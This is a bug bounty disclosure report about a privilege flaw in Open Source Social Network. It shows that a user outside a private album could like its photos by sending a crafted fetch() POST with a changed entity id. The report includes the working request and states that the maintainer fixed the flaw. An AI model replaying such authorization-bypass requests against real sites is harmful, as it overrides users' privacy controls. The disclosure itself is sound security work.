Improper Privilege Management in opensource-socialnetwork/opensource-socialnetwork

Valid

Reported on

Jul 22nd 2021

💥 BUG

unprivileged user can like to private album .

💥 IMPACT

user who does not have permiison in private album still can comment in that album.

💥 STEP TO RERPODUCE

There is two user called user-A and user-B.
1. First goto user-A account and create a private album .
Lets album url is http://localhost/opensource-socialnetwork/album/view/10 and only friends can see this album .

2. Now goto user-B account and sent bellow request which will make a like

await fetch("http://localhost/opensource-socialnetwork/action/post/like?ossn_ts=1626891487&ossn_token=1621bc0dbc2b6deaca5953fb7b090441d4d2eb2295ced160c9471214a09f2112", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    },
    "referrer": "http://localhost/opensource-socialnetwork/photos/view/56",
    "body": "&entity=56&reaction_type=haha",
    "method": "POST",
    "mode": "cors"
});

Here in this request change entity id to image id of private album and execute the javascript code in browser-console and see like is performed in private album

We have contacted a member of the opensource-socialnetwork team and are waiting to hear back 2 years ago
opensource-socialnetwork/opensource-socialnetwork maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
opensource-socialnetwork/opensource-socialnetwork maintainer marked this as fixed with commit 17e951 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation